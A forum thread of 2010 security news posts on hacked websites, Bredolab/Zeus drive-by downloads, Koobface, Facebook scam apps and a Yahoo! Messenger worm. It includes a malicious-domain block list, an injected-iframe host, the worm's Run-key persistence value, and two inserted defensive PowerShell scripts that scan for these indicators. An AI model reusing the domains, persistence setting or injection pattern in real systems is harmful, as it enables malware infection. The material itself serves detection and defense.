Mixed in with these have been an assortment of older exploits for Adobe Flash, Microsoft DirectShow, and miscellaneous Adobe Reader/Acrobat PDF exploits. Successful exploit leads to the download of a binary (also hosted on the same domain) which in observed cases has been a variant of the Bredolab trojan... Bredolab acts as a downloader agent. In the cases we've observed, this particular variant of Bredolab is downloading Zbot/Zeus. Encounters with these attacks are fairly steady and comprised 1% of all ScanSafe Web malware blocks in March (compared to Gumblar at 17%). What's particularly interesting about these attacks isn't the volume, but rather that they appear to be a vector for rapid deployment of the latest zero day exploits. And while the IP addresses and domain names for the attacker-owned sites have changed, the delivery method has remained constant."
:fear::mad::fear:
AplusWebMaster
2010-04-19, 00:31
FYI...
songlyrics .com... hacked/serving exploits
- http://www.h-online.com/security/news/item/Java-vulnerability-when-lyric-sites-attack-Update-978283.html
15 April 2010 - "... songlyrics .com... site appears to have been hacked by criminals who have embedded a program to download malicious code from a Russian web server... According to analysis by Wepawet... the attackers are not just exploiting the Java vulnerability, but also multiple vulnerabilities in Adobe Reader... fixed 15 vulnerabilities in Reader with update 9.3.2..."
Java JRE 6 Update 20 update released
- http://java.sun.com/javase/downloads/index.jsp
April 15, 2010
Adobe Reader and Acrobat v9.3.2 update released
- http://www.adobe.com/support/security/bulletins/apsb10-09.html
April 13, 2010
- http://google.com/safebrowsing/diagnostic?site=songlyrics.com/
"... 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-04-17, and the last time suspicious content was found on this site was on 2010-04-14..."
- http://thompson.blog.avg.com/2010/04/heads-up-0day-itw-rihanna-is-a-lure.html
April 14, 2010 - "... So far, it's not in any of the exploit kits, as far as we can see, but it's a given that it soon will be..."
:fear::confused::sad:
AplusWebMaster
2010-04-19, 12:16
FYI...
Network Solutions hacked again
- http://blog.sucuri.net/2010/04/network-solutions-hacked-again.html
April 18, 2010 - "Network Solutions is getting hacked again. Just today we were notified of more than 50 sites hacked with... malware javascript... it is injecting this iframe from http ://corpadsinc .com/grep/ *... this time we are seeing all kind of sites hacked. From Wordpress, Joomla to just simple HTML sites..."
(More detail and updates at the URL above.)
* http://google.com/safebrowsing/diagnostic?site=corpadsinc.com/
"... Site is listed as suspicious - visiting this web site may harm your computer... The last time Google visited this site was on 2010-04-19, and the last time suspicious content was found on this site was on 2010-04-19. Malicious software includes 9 exploit(s)... this site has hosted malicious software over the past 90 days. It infected 226 domain(s)..."
- http://isc.sans.org/diary.html?storyid=8647
Last Updated: 2010-04-18 21:47:10 UTC
- http://www.malwaredomains.com/wordpress/?p=935
April 18, 2010 - "Make sure the following domains are blocked or blacklisted:
binglbalts . com
corpadsinc .com
fourkingssports .com
networkads .net
mainnetsoll .com
sources: http://ddanchev.blogspot.com/2010/04/dissecting-wordpress-blogs-compromise.html ,
http://isc.sans.org/diary.html?storyid=8647 ."
- http://krebsonsecurity.com/2010/04/network-solutions-again-under-siege/
April 19, 2010
- http://stopmalvertising.com/malvertisements/corpadsinccom-redirecting-network-solutions-customers-again
April 19, 2010
- http://forums.spybot.info/showpost.php?p=367245&postcount=242
April 10, 2010
:fear::mad:
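An added example, not from the quoted posts or the forum: a read-only scan of a local export of a site's files for <iframe>/<script> tags that load from the domains the malwaredomains.com post above says to block. The domain list is copied from the page; the export path, file extensions and the regex form are assumptions.

```powershell
# Added example (not from the quoted sources): find injected <iframe>/<script>
# tags whose src points at the blocked domains listed in the post above.
# Domain list is from the page; root path and extensions are assumptions.
$BlockedDomains = @(
    'binglbalts.com', 'corpadsinc.com', 'fourkingssports.com',
    'networkads.net', 'mainnetsoll.com'
)

function Find-InjectedTags {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Root,            # local copy of the web root
        [string[]] $Domains    = $BlockedDomains,
        [string[]] $Extensions = @('*.html', '*.htm', '*.php', '*.js')
    )
    # One alternation of regex-escaped domains; any subdomain prefix is allowed,
    # as is a scheme-less "//host" reference. The "http ://" spacing used on
    # the page is defanging and is deliberately not matched.
    $domainAlt = ($Domains | ForEach-Object { [regex]::Escape($_) }) -join '|'
    $pattern = '<(?:iframe|script)\b[^>]*\bsrc\s*=\s*["'']?\s*(?:https?:)?//' +
               '(?:[\w-]+\.)*(?:' + $domainAlt + ')(?=[/"''\s>]|$)'

    Get-ChildItem -Path $Root -Recurse -File -Include $Extensions -ErrorAction SilentlyContinue |
        Select-String -Pattern $pattern -AllMatches |
        ForEach-Object {
            $hit = $_
            foreach ($m in $hit.Matches) {
                # One record per injected tag: where it is and what it loads
                [pscustomobject]@{
                    File  = $hit.Path
                    Line  = $hit.LineNumber
                    Match = $m.Value
                }
            }
        }
}

# Usage (assumed export path):
# Find-InjectedTags -Root 'C:\siteexport' | Format-Table -AutoSize
```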
AplusWebMaster
2010-04-20, 17:58
FYI...
Bot installs adware with FLV video player
- http://sunbeltblog.blogspot.com/2010/04/bot-installs-adware-along-with-video.html
April 20, 2010 - "... investigating a botnet that auto installed FLV Direct Player. The player bundles Zugo Search adware, also known as LoudMo, on victims’ machines. FLV Direct is available freely on the web. The bot, however, uses an AutoIT script to script through the installation screens so the victim never sees the install... It also changes the victim machine’s home page to bing.zugo .com. Apparently this is some kind of affiliate operation – the malefactor affiliates get paid for installing LoudMo adware on the machines of unknowing victims and they just decided to do it wholesale with a botnet. Affiliates also are spamming heavily on Twitter (and who else knows where else) trying to get people to install the FLV Player..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2010-04-22, 18:50
FYI...
Twitter SPAM in your Inbox
- http://isc.sans.org/diary.html?storyid=8674
Last Updated: 2010-04-22 15:25:05 UTC - "... received several emails today "from" support@twitter .com (Of course they really aren't from support.). We are also receiving reports from our readers that they are seeing the same thing. The emails claim that you have unread messages from Twitter and contain a link that you can supposedly click on to view the messages. The links are to various locations other than Twitter. Don't be fooled. The emails are -not- from Twitter and the links are -not- at Twitter. Just a reminder NEVER click on links in emails. Always login to your account to check it out... contacted Twitter and reported the emails..."
:fear::mad:
AplusWebMaster
2010-04-29, 14:44
FYI...
Facebook - Koobface spreading campaign
- http://ddanchev.blogspot.com/2010/04/dissecting-koobface-gangs-latest.html
April 27, 2010 - "During the weekend... the Koobface gang... launched another spreading attempt across Facebook, with Koobface-infected users posting bogus video links on their walls.
> Recommended reading: 10 things you didn't know about the Koobface gang
- http://blogs.zdnet.com/security/?p=5452 [February 23, 2010]
What's particularly interesting about the campaign is that the gang is now starting to publicly acknowledge its connections with xorg .pl* (Malicious software includes 40706 scripting exploit(s), 4119 trojan(s), 1897 exploit(s)), with an actual subdomain residing there embedded on Koobface-serving compromised hosts..."
* http://www.google.com/safebrowsing/diagnostic?site=xorg.pl/
"... The last time Google visited this site was on 2010-04-29, and the last time suspicious content was found on this site was on 2010-04-29..."
:fear::mad::fear:
AplusWebMaster
2010-04-29, 23:09
FYI...
Undetectable Facebook Scams
- http://www.pcworld.com/article/195186/new_threat_undetectable_facebook_scams.html
Apr 28, 2010 - "... recently received two Facebook e-mail notifications... Nothing was obviously wrong with the e-mail messages, which said that my friend had tagged a photo of me and then commented on it. But something about a reference to an app named "Who stalks into your profile" just didn't feel right. So I checked it out. I dug into the e-mail header to make sure that it was from Facebook - it was. A search for the app's name didn't turn up any warnings. The app's installation page didn't give me any obvious clues, either. Still, I let my paranoia have its day, and I sat on the app. Sure enough, it was a scam, and an ingenious one. When anyone installed the supposed stalker app, it first created a photo montage of friends' images and then commented on that montage. Facebook duly sent out "your friend tagged a photo of you" messages, effectively advertising the scam app, which was created to generate illicit online ad revenue. Facebook, with its millions of users, has become a major target for online crooks who try to use malicious apps for everything from phishing to spam to a first step toward installing more dangerous malware onto your PC..."
:mad:
AplusWebMaster
2010-05-03, 04:27
FYI...
New Yahoo! Messenger worm
- http://www.symantec.com/connect/blogs/new-yahoo-messenger-worm
May 2, 2010 - "... new Yahoo! Messenger worm doing the rounds. Potential victims receive instant messages from contacts in their list, containing a link claiming to be a photo, which in reality points to a malicious executable... The page at the end of the link is basic and does not employ any exploits in order to install the worm, it relies solely on social engineering to trick victims into believing they are opening a picture from a friend, while in fact they run the worm... When the link is clicked, the default browser is redirected to the worm executable, which has a misleading name. Please note the file extension is actually “.exe”. In order to run, the worm still needs the user’s action to open/run the file. Once run, the worm copies itself to %WinDir%\infocard.exe, then it adds itself to the Windows Firewall List, stops the Windows Updates service and sets the following registry value so that it runs every time the system boots:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\“Firewall Administrating” = “%WinDir%\infocard.exe”
Then it looks for the Yahoo! Messenger application on the system, and sends out links to the worm to everyone in the contact list. It may also download and execute other malicious files. When run the first time, the worm will open a new page to the following address, so some photos eventually appear to the user, in order to mask the infection: browseusers.myspace .com/Browse/Browse.aspx Symantec detects and remediates this threat as W32.Yimfoca..."
(Screenshots available at the Symantec URL above.)
- http://www.internetnews.com/security/article.php/3880966/Messenger+Worm+Preys+On+Users+Trust.htm
May 7, 2010 - "... This latest socially engineered malware scam first appears as a friendly invite from a contact in a user's Yahoo Messenger account. What appears to be a smiley-faced invite to take a gander at some new photos is actually the first step down the slippery slope to becoming a botnet..."
:fear::mad:
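A defender-side check for the W32.Yimfoca indicators Symantec lists above (the dropped %WinDir%\infocard.exe, the "Firewall Administrating" Run value, the stopped Windows Update service and the firewall exception), as an added example that is not from the Symantec post or the forum; the firewall-list registry path and the wuauserv service name are assumptions not found on the page.

```powershell
# Added example, not from the Symantec write-up or the forum post: read-only
# host check for the W32.Yimfoca indicators quoted above. Assumptions (not on
# the page): the firewall exception is read from the XP/2003-era
# AuthorizedApplications list, and the Windows Update service is 'wuauserv'.
function Test-YimfocaIndicators {
    [CmdletBinding()]
    param(
        [string] $RunKey       = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        [string] $RunValueName = 'Firewall Administrating',
        [string] $DropPath     = (Join-Path $env:WINDIR 'infocard.exe'),
        [string] $FirewallList = 'HKLM:\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List'
    )
    $findings = @()

    # 1. Dropped copy of the worm in the Windows directory
    if (Test-Path -LiteralPath $DropPath) {
        $findings += "Dropped file present: $DropPath"
    }

    # 2. Run-key persistence: the value name from the write-up, plus any other
    #    Run value whose data points at infocard.exe (value names are cheap to change)
    $run = Get-ItemProperty -Path $RunKey -ErrorAction SilentlyContinue
    if ($run) {
        foreach ($p in $run.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }            # skip PSPath etc.
            if ($p.Name -eq $RunValueName -or "$($p.Value)" -like '*infocard.exe*') {
                $findings += ("Run value '{0}' = {1}" -f $p.Name, $p.Value)
            }
        }
    }

    # 3. Windows Update service stopped (the worm stops it)
    $wu = Get-Service -Name wuauserv -ErrorAction SilentlyContinue
    if ($wu -and $wu.Status -ne 'Running') {
        $findings += "Windows Update service (wuauserv) status: $($wu.Status)"
    }

    # 4. Firewall exception for the dropped binary (assumed registry list, see above)
    $fw = Get-ItemProperty -Path $FirewallList -ErrorAction SilentlyContinue
    if ($fw) {
        foreach ($p in $fw.PSObject.Properties) {
            if ($p.Name -like '*infocard.exe*') {
                $findings += "Firewall exception: $($p.Name) = $($p.Value)"
            }
        }
    }
    return ,$findings    # empty array: none of the indicators were observed
}
Test-YimfocaIndicators
```

Run from an elevated PowerShell session so the HKLM keys and the Windows directory are readable; an empty result means none of the quoted indicators were present, not that the host is clean.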